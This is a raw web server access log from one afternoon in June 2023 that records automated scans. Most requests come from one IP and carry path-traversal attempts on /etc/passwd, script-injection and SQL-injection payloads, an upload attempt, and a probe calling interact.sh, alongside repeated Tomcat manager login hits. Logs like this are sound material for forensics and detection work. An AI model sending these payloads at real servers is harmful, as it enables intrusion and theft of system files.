41.186.73.134 - - [18/Jun/2023:17:45:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:17:46:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:17:47:16 +0530] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 404 1132
107.189.31.184 - - [18/Jun/2023:17:47:17 +0530] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 404 1132
107.189.31.184 - - [18/Jun/2023:17:47:25 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
107.189.31.184 - - [18/Jun/2023:17:47:26 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
107.189.31.184 - - [18/Jun/2023:17:47:27 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
107.189.31.184 - - [18/Jun/2023:17:47:28 +0530] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 404 1062
87.120.88.58 - - [18/Jun/2023:17:49:32 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:17:49:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:17:50:33 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:17:50:33 +0530] "POST /wp-admin/admin.php HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:17:50:49 +0530] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:17:50:50 +0530] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:17:51:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:17:51:21 +0530] "POST /service/rapture/session HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:17:51:22 +0530] "POST /service/rapture/session HTTP/1.1" 404 1040
91.196.178.243 - - [18/Jun/2023:17:52:14 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:17:52:37 +0530] "POST /directdata/direct/router HTTP/1.1" 404 1042
107.189.31.184 - - [18/Jun/2023:17:52:38 +0530] "POST /directdata/direct/router HTTP/1.1" 404 1042
107.189.31.184 - - [18/Jun/2023:17:52:39 +0530] "GET /2RHou6gtS0JP6y6ocpJv5Nvdlh5.txt HTTP/1.1" 404 1056
107.189.31.184 - - [18/Jun/2023:17:52:40 +0530] "GET /2RHou6gtS0JP6y6ocpJv5Nvdlh5.txt HTTP/1.1" 404 1056
107.189.31.184 - - [18/Jun/2023:17:54:14 +0530] "GET /wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/ HTTP/1.1" 404 1058
107.189.31.184 - - [18/Jun/2023:17:54:14 +0530] "GET /wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/ HTTP/1.1" 404 1058
41.186.73.134 - - [18/Jun/2023:17:54:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:17:55:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:17:56:03 +0530] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:17:56:04 +0530] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:17:56:48 +0530] "GET /csrf HTTP/1.1" 404 1002
107.189.31.184 - - [18/Jun/2023:17:56:49 +0530] "GET /csrf HTTP/1.1" 404 1002
107.189.31.184 - - [18/Jun/2023:17:57:49 +0530] "GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 404 1062
107.189.31.184 - - [18/Jun/2023:17:57:50 +0530] "GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1" 404 1062
41.186.73.134 - - [18/Jun/2023:17:58:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:17:59:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:00:02 +0530] "GET /logfile HTTP/1.1" 404 1008
107.189.31.184 - - [18/Jun/2023:18:00:03 +0530] "GET /logfile HTTP/1.1" 404 1008
107.189.31.184 - - [18/Jun/2023:18:00:05 +0530] "GET /actuator/logfile HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:18:00:05 +0530] "GET /actuator/logfile HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:18:00:06 +0530] "GET /actuators/logfile HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:18:00:07 +0530] "GET /actuators/logfile HTTP/1.1" 404 1028
103.169.34.47 - - [18/Jun/2023:18:02:22 +0530] "CONNECT www.google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:18:02:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:03:59 +0530] "eval 'local null" 400 -
107.189.31.184 - - [18/Jun/2023:18:04:00 +0530] "eval 'local null" 400 -
41.186.73.134 - - [18/Jun/2023:18:04:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
8.219.177.107 - - [18/Jun/2023:18:04:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
8.219.177.107 - - [18/Jun/2023:18:04:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:04:56 +0530] "GET /car1/estimateresult/result?s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
107.189.31.184 - - [18/Jun/2023:18:04:56 +0530] "GET /car1/estimateresult/result?s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1046
41.186.73.134 - - [18/Jun/2023:18:07:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:08:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:08:51 +0530] "GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1" 404 1046
107.189.31.184 - - [18/Jun/2023:18:08:52 +0530] "GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1" 404 1046
107.189.31.184 - - [18/Jun/2023:18:09:31 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:18:09:32 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
107.189.31.184 - - [18/Jun/2023:18:09:41 +0530] "GET /badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1052
107.189.31.184 - - [18/Jun/2023:18:09:41 +0530] "GET /badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1052
107.189.31.184 - - [18/Jun/2023:18:09:42 +0530] "POST /dfsms/index.php HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:18:09:44 +0530] "POST /dfsms/index.php HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:18:09:44 +0530] "GET /dfsms/add-category.php HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:18:09:46 +0530] "GET /dfsms/add-category.php HTTP/1.1" 404 1038
107.189.31.184 - - [18/Jun/2023:18:09:53 +0530] "PUT /fileserver/test.txt HTTP/1.1" 403 1004
107.189.31.184 - - [18/Jun/2023:18:09:54 +0530] "PUT /fileserver/test.txt HTTP/1.1" 403 1004
107.189.31.184 - - [18/Jun/2023:18:09:55 +0530] "GET /fileserver/test.txt HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:18:09:56 +0530] "GET /fileserver/test.txt HTTP/1.1" 404 1032
41.186.73.134 - - [18/Jun/2023:18:11:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:12:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:15:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:16:13 +0530] "GET /api/experimental/latest_runs HTTP/1.1" 404 1050
107.189.31.184 - - [18/Jun/2023:18:16:14 +0530] "GET /api/experimental/latest_runs HTTP/1.1" 404 1050
41.186.73.134 - - [18/Jun/2023:18:16:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:17:55 +0530] "GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?pre=2RHou4Fc9pN3RAJqsrFN5oHzO1s&query_term=path%3a/ HTTP/1.1" 404 1112
87.120.88.59 - - [18/Jun/2023:18:17:56 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:18:17:56 +0530] "GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?pre=2RHou4Fc9pN3RAJqsrFN5oHzO1s&query_term=path%3a/ HTTP/1.1" 404 1112
8.219.177.107 - - [18/Jun/2023:18:19:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
8.219.177.107 - - [18/Jun/2023:18:19:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:19:12 +0530] "GET /plugins/jobsearch/?ajax_filter=true&posted=all&search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&sort-by=recent HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:18:19:12 +0530] "GET /plugins/jobsearch/?ajax_filter=true&posted=all&search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&sort-by=recent HTTP/1.1" 404 1030
41.186.73.134 - - [18/Jun/2023:18:20:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:20:11 +0530] "GET /wp-admin/admin-ajax.php?action=directorist_author_pagination HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:18:20:12 +0530] "GET /wp-admin/admin-ajax.php?action=directorist_author_pagination HTTP/1.1" 404 1040
90.151.171.108 - - [18/Jun/2023:18:21:06 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [18/Jun/2023:18:21:06 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:18:21:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.108 - - [18/Jun/2023:18:21:11 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:18:21:11 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:18:21:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [18/Jun/2023:18:21:17 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [18/Jun/2023:18:21:22 +0530] "-" 400 -
90.151.171.108 - - [18/Jun/2023:18:21:22 +0530] "-" 400 -
107.189.31.184 - - [18/Jun/2023:18:21:22 +0530] "POST /index.php?action=login.index HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:18:21:23 +0530] "POST /index.php?action=login.index HTTP/1.1" 404 1012
112.120.138.183 - - [18/Jun/2023:18:21:25 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:18:24:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:24:50 +0530] "GET /phpmyadmin/ HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:18:24:50 +0530] "GET /phpmyadmin/ HTTP/1.1" 404 1016
41.186.73.134 - - [18/Jun/2023:18:25:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:26:28 +0530] "GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1" 404 1128
107.189.31.184 - - [18/Jun/2023:18:26:28 +0530] "GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1" 404 1128
107.189.31.184 - - [18/Jun/2023:18:27:26 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:18:27:26 +0530] "GET null null" 400 -
41.186.73.134 - - [18/Jun/2023:18:28:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:29:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:32:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:33:27 +0530] "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1" 404 1064
107.189.31.184 - - [18/Jun/2023:18:33:27 +0530] "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1" 404 1064
107.189.31.184 - - [18/Jun/2023:18:33:58 +0530] "GET /api/v1/components?1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--&name=1 HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:18:33:58 +0530] "GET /api/v1/components?1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--&name=1 HTTP/1.1" 404 1028
41.186.73.134 - - [18/Jun/2023:18:34:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:36:47 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:18:36:47 +0530] "GET null null" 400 -
41.186.73.134 - - [18/Jun/2023:18:37:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:37:46 +0530] "GET /?author=1 HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:18:37:46 +0530] "GET /?author=1 HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:18:38:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:38:47 +0530] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 1260
107.189.31.184 - - [18/Jun/2023:18:38:48 +0530] "GET /monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 1260
107.189.31.184 - - [18/Jun/2023:18:40:04 +0530] "GET /?p=1 HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:18:40:05 +0530] "GET /?p=1 HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:18:40:18 +0530] "GET /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1" 404 1050
107.189.31.184 - - [18/Jun/2023:18:40:19 +0530] "GET /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1" 404 1050
41.186.73.134 - - [18/Jun/2023:18:41:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:42:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:43:40 +0530] "GET /opensis/ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:18:43:41 +0530] "GET /opensis/ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1026
107.189.31.184 - - [18/Jun/2023:18:43:42 +0530] "GET /ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:18:43:43 +0530] "GET /ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:18:45:23 +0530] "GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1112
107.189.31.184 - - [18/Jun/2023:18:45:25 +0530] "GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1112
41.186.73.134 - - [18/Jun/2023:18:45:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
78.108.177.52 - - [18/Jun/2023:18:46:04 +0530] "GET / HTTP/1.0" 200 11230
107.189.31.184 - - [18/Jun/2023:18:46:09 +0530] "POST /spcgi.cgi HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:18:46:09 +0530] "POST /spcgi.cgi HTTP/1.1" 404 1012
107.189.31.184 - - [18/Jun/2023:18:46:19 +0530] "POST /login HTTP/1.1" 404 1004
107.189.31.184 - - [18/Jun/2023:18:46:19 +0530] "POST /login HTTP/1.1" 404 1004
41.186.73.134 - - [18/Jun/2023:18:46:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [18/Jun/2023:18:47:32 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [18/Jun/2023:18:47:32 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:18:47:32 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [18/Jun/2023:18:47:33 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:18:47:37 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [18/Jun/2023:18:47:38 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [18/Jun/2023:18:47:38 +0530] "-" 400 -
90.151.171.106 - - [18/Jun/2023:18:47:38 +0530] "-" 400 -
41.186.73.134 - - [18/Jun/2023:18:50:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:50:43 +0530] "GET /wp-admin/install.php HTTP/1.1" 404 1034
107.189.31.184 - - [18/Jun/2023:18:50:43 +0530] "GET /wp-admin/install.php HTTP/1.1" 404 1034
107.189.31.184 - - [18/Jun/2023:18:51:02 +0530] "GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [18/Jun/2023:18:51:03 +0530] "GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1076
107.189.31.184 - - [18/Jun/2023:18:51:09 +0530] "GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:18:51:10 +0530] "GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1" 404 1040
41.186.73.134 - - [18/Jun/2023:18:51:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
201.209.82.71 - - [18/Jun/2023:18:51:35 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:18:52:45 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:18:52:45 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:18:52:47 +0530] "GET /2RHotlyrJCdE4uVfltgPLqJ8ouE.php%5Cx0A HTTP/1.1" 400 -
107.189.31.184 - - [18/Jun/2023:18:52:47 +0530] "GET /2RHotlyrJCdE4uVfltgPLqJ8ouE.php%5Cx0A HTTP/1.1" 400 -
41.186.73.134 - - [18/Jun/2023:18:54:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:18:55:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:18:55:51 +0530] "POST /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [18/Jun/2023:18:55:51 +0530] "POST /admin/ HTTP/1.1" 404 1006
107.189.31.184 - - [18/Jun/2023:18:55:52 +0530] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:18:55:52 +0530] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 1030
41.186.73.134 - - [18/Jun/2023:18:58:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:00:00 +0530] "GET /jquery-file-upload/server/php/ HTTP/1.1" 404 1054
107.189.31.184 - - [18/Jun/2023:19:00:00 +0530] "GET /jquery-file-upload/server/php/ HTTP/1.1" 404 1054
41.186.73.134 - - [18/Jun/2023:19:00:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:01:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:19:01:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:19:01:21 +0530] "GET /wp-content/uploads/p3d/2RHotr4YBjHZRQfH2AUeXDHXwZh.php HTTP/1.1" 404 1102
107.189.31.184 - - [18/Jun/2023:19:01:21 +0530] "GET /wp-content/uploads/p3d/2RHotr4YBjHZRQfH2AUeXDHXwZh.php HTTP/1.1" 404 1102
107.189.31.184 - - [18/Jun/2023:19:02:07 +0530] "GET /controlcenter.php?dir=%2Fetc&ffile=passwd&opmod=open&opt=contents/Files HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:02:07 +0530] "GET /controlcenter.php?dir=%2Fetc&ffile=passwd&opmod=open&opt=contents/Files HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:02:38 +0530] "GET /webadmin/clientlogin/?action=showdeny&srid&url HTTP/1.1" 404 1036
107.189.31.184 - - [18/Jun/2023:19:02:39 +0530] "GET /webadmin/clientlogin/?action=showdeny&srid&url HTTP/1.1" 404 1036
41.186.73.134 - - [18/Jun/2023:19:03:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [18/Jun/2023:19:04:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:05:46 +0530] "GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1" 404 1010
107.189.31.184 - - [18/Jun/2023:19:05:46 +0530] "GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1" 404 1010
41.186.73.134 - - [18/Jun/2023:19:07:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:08:38 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
41.186.73.134 - - [18/Jun/2023:19:08:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:08:39 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [18/Jun/2023:19:10:14 +0530] "GET /web/xml/webuser-auth.xml HTTP/1.1" 404 1042
107.189.31.184 - - [18/Jun/2023:19:10:14 +0530] "GET /web/xml/webuser-auth.xml HTTP/1.1" 404 1042
41.186.73.134 - - [18/Jun/2023:19:11:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:12:54 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
107.189.31.184 - - [18/Jun/2023:19:12:55 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
41.186.73.134 - - [18/Jun/2023:19:13:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
180.163.220.125 - - [18/Jun/2023:19:15:24 +0530] "-" 400 -
180.163.220.62 - - [18/Jun/2023:19:15:56 +0530] "GET /img/ico.ico HTTP/1.1" 404 1016
180.163.220.60 - - [18/Jun/2023:19:15:56 +0530] "GET /robots.txt HTTP/1.1" 404 1014
180.163.220.124 - - [18/Jun/2023:19:15:58 +0530] "GET /sitemap.xml HTTP/1.1" 404 1016
41.186.73.134 - - [18/Jun/2023:19:16:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:16:30 +0530] "GET /connections HTTP/1.1" 404 1016
107.189.31.184 - - [18/Jun/2023:19:16:30 +0530] "GET /connections HTTP/1.1" 404 1016
41.186.73.134 - - [18/Jun/2023:19:17:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:17:37 +0530] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:19:17:37 +0530] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:19:17:43 +0530] "GET /verify.php?confirm_hash&id=1 HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:19:17:45 +0530] "GET /mantis/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:17:46 +0530] "GET /verify.php?confirm_hash&id=1 HTTP/1.1" 404 1014
107.189.31.184 - - [18/Jun/2023:19:17:47 +0530] "GET /mantisBT/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:17:48 +0530] "GET /mantis/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:17:49 +0530] "GET /mantisbt-2.3.0/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:19:17:50 +0530] "GET /mantisBT/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:17:51 +0530] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:19:17:53 +0530] "GET /mantisbt-2.3.0/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1044
107.189.31.184 - - [18/Jun/2023:19:17:55 +0530] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1024
107.189.31.184 - - [18/Jun/2023:19:18:10 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:19:18:10 +0530] "POST / HTTP/1.1" 200 11250
41.186.73.134 - - [18/Jun/2023:19:20:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:21:16 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [18/Jun/2023:19:21:16 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
41.186.73.134 - - [18/Jun/2023:19:21:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [18/Jun/2023:19:21:37 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:19:21:37 +0530] "POST / HTTP/1.1" 200 11250
107.189.31.184 - - [18/Jun/2023:19:21:47 +0530] "GET /lab/api/settings/ HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:21:47 +0530] "GET /lab/api/settings/ HTTP/1.1" 404 1028
107.189.31.184 - - [18/Jun/2023:19:22:44 +0530] "POST /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:22:46 +0530] "POST /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:22:46 +0530] "POST /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:22:47 +0530] "POST /nacos/v1/cs/configs?content=helloWorld&dataId=nacos.cfg.dataIdfoo&group=foo HTTP/1.1" 404 1032
107.189.31.184 - - [18/Jun/2023:19:23:45 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:19:23:46 +0530] "GET null null" 400 -
107.189.31.184 - - [18/Jun/2023:19:23:47 +0530] "GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/2RHou4JSTUQpdd5LIMQpvtEVmC3/);marmoset.embed(%27a HTTP/1.1" 404 1086
